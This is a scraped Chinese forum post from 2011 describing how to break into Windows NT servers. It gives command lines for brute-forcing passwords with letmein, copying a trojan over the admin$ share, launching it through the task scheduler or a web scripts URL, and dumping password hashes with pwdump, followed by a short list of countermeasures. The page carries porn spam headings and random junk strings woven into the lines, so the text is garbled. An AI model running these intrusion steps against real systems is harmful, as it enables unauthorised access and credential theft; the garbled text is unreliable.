亚洲色一色噜一噜噜噜_在线国产精品一区二区_91国自产拍 精品_国产伦三级一区二区

  • <object id="nlumt"><tt id="nlumt"><pre id="nlumt"></pre></tt></object>
    <legend id="nlumt"><mark id="nlumt"></mark></legend>
    <pre id="nlumt"><tt id="nlumt"><rt id="nlumt"></rt></tt></pre>

    <bdo id="nlumt"><delect id="nlumt"></delect></bdo>

       找回密碼
       注冊(cè)

      QQ登錄

      只需一步,快速開始

      遠(yuǎn)程入侵NT ----spp(低音炮)

      [復(fù)制鏈接]
      1#
      發(fā)表于 2011-1-12 16:31:02 | 只看該作者 |倒序?yàn)g覽 |閱讀模式
      看了篇文章介紹使用netbus 或 netspy 遠(yuǎn)程入侵nt系統(tǒng),感覺真是。??磥韓t系統(tǒng)的共享機(jī)制如果不配合火墻使用,SMB會(huì)給你造成很大麻煩。?!∵B小小 只的木馬都可以讓nt管理員頭大。 0 H4 H8 ~& K, P6 c. N
          其攻擊過程如下:
      + q# t% t! O+ k# E% h1、使用掃描工具查找NT主機(jī)       3 p/ u+ W$ P) L- p
      2 、確定攻擊目標(biāo)后,使用letmein 對(duì)目標(biāo)主機(jī)進(jìn)行攻擊, 如:
      ) [/ F7 I5 Z# @4 @5 W- ]( |letmein file://x.x.x.x/ -all -g mypwd (對(duì)\\x.x.x.x上所有用戶攻擊) & }- N! s- m8 J& K# j: q
      letmein file://x.x.x.x/ -admin -g mypwd (對(duì)\\x.x.x.x上管理員攻擊)
      3 }; D" c% w8 N  jletmein file://x.x.x.x/ -all -d mypwd (顯示\\x.x.x.x上所有用戶)
      ; P6 y: r0 A! y5 v9 N注:- 確定目標(biāo)后,收集目標(biāo)信息并嘗試取得非法資源 / O: `9 u9 n* Z0 e& M
      3、當(dāng)letmein 獲取相關(guān)管理員權(quán)限后,使用ms提供的合法命令:
      2 Y2 ~' d0 R; ]+ inet use \\x.x.x.x\ipc$ "pass"/user:"user" 連接遠(yuǎn)程資源并將木馬拷入遠(yuǎn)程
      ' ~. h: K5 C! b6 U+ Lcopy x:\netserver.exe \\x.x.x.x\admin$\system32
      " p3 J# W5 s# D' Q; g! u, Y4、使用合法ms命令遠(yuǎn)程啟動(dòng)木馬服務(wù):
      3 P  T% A  E. v2 ]. @netsvc \\x.x.x.x schedule /start at \\x.x.x.x hh:mm netserver.exe /port:yourport /nomsg / l/ ~# B' z6 n* Z4 o
      / F% s% A! S) _8 v# w6 f% q
         該方法有其巧妙之處。。利用nt的任務(wù)計(jì)劃管理,在特定時(shí)候啟動(dòng)木馬服務(wù) + d5 }" I* b. H1 N
      # v! {7 b- O  f
         另一種方法: . {6 I# ]4 q( D6 A0 U/ _3 _4 ~
         將ntsrver.exe 或其他運(yùn)行程序Copy到目的服務(wù)器的www可執(zhí)行目錄, 如cgi-bin或scripts,然后在瀏覽器鍵入url如: http://x.x.x.x/scripts/ntsrver.exe /port:yourport 或 http://x.x.x.x/cgi-gin/ntsrver.exe /port:yourport 木馬服務(wù)將被啟動(dòng)
      - ]3 J, f4 P2 m$ b8 f; p
      2 f, M9 K8 s" r  g6 v    到此,該次攻擊可以算成功了,遠(yuǎn)程資源已在別人控制下。 2 a3 B# n  }* k/ ~- M
          如果在遠(yuǎn)程使用app redirect 啟動(dòng)一個(gè)cmd.exe到特定端口 , 那么你可以telnet 到該端口,更方便使用該遠(yuǎn)程資源 。比如:使用pwdump 將遠(yuǎn)程nt上所有用戶和密碼 dump成文件,回傳本地,使用其他工具如l0phtcrack來運(yùn)算。 分析該次攻擊的整體過程,不難看出,關(guān)鍵步驟是letmein取得admin權(quán)限,但是很不幸,就目前廈門(有些是省內(nèi))的nt服務(wù)器管理員而言,密碼對(duì)letmein只是多花幾分鐘而已。我對(duì)某些大的公共平臺(tái)服務(wù)器進(jìn)行掃描的結(jié)果,除了solaris和linux系統(tǒng)之外,其余的nt被letmein猜中率有75%以上。而且在這些被進(jìn)入的機(jī)器上,SMB都有在tcp/ip上 跑,有兩臺(tái)有配備火墻,但是沒有封閉對(duì)外137-139口。 ; _' o( k0 k2 S* E) O- z
      + f: N5 E6 H0 D9 R9 x- M
           對(duì)策: 2 Z1 p' Z. L2 Z0 V
      1、還是老話,密碼的選擇問題,使用向..@2KjsfiM7v!09..這樣的密碼會(huì)讓任何使用 暴力法計(jì)算的機(jī)器算到cpu燒掉。   l8 p5 L7 y: E5 A4 H
      2、nt網(wǎng)絡(luò)的適當(dāng)配置,不要在對(duì)外的nc綁定共享服務(wù)是個(gè)好習(xí)慣,特別是tcp/ip協(xié)議。
      - J9 d6 R- F8 r- U* g9 h3 H( q3、防火墻的配置,屏蔽一切不需要的服務(wù)端口,象netebui在tcp/ip上的137-139口,開這些口只會(huì)使你的系統(tǒng)處于危險(xiǎn)的處境,如果非要在遠(yuǎn)程使用這些口的服務(wù),建議使用其他軟件來代替。
      ) A# o& b$ n4 \# c: _+ s4、及時(shí)檢查日記和監(jiān)控服務(wù)的運(yùn)行,定時(shí)對(duì)文件系統(tǒng)的權(quán)限受托關(guān)系進(jìn)行檢查。 8 \8 w6 R. s2 X% L6 W- ~% i2 Z6 S
      5、管理人員素質(zhì)的提高,安全風(fēng)險(xiǎn)意思加強(qiáng)無疑對(duì)你管理的系統(tǒng)有很多好處。 -- SPP 10Hz的低頻 你聽不到的聲音卻無時(shí)不刻在影響著你 。9 c& F1 |& {+ M8 E/ X; [" Z
      您需要登錄后才可以回帖 登錄 | 注冊(cè)

      本版積分規(guī)則

      QQ|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機(jī)版|小黑屋|汶上信息港 ( 魯ICP備19052200號(hào)-1 )

      GMT+8, 2025-6-28 05:19

      Powered by Discuz! X3.5

      © 2001-2025 Discuz! Team.

      快速回復(fù) 返回頂部 返回列表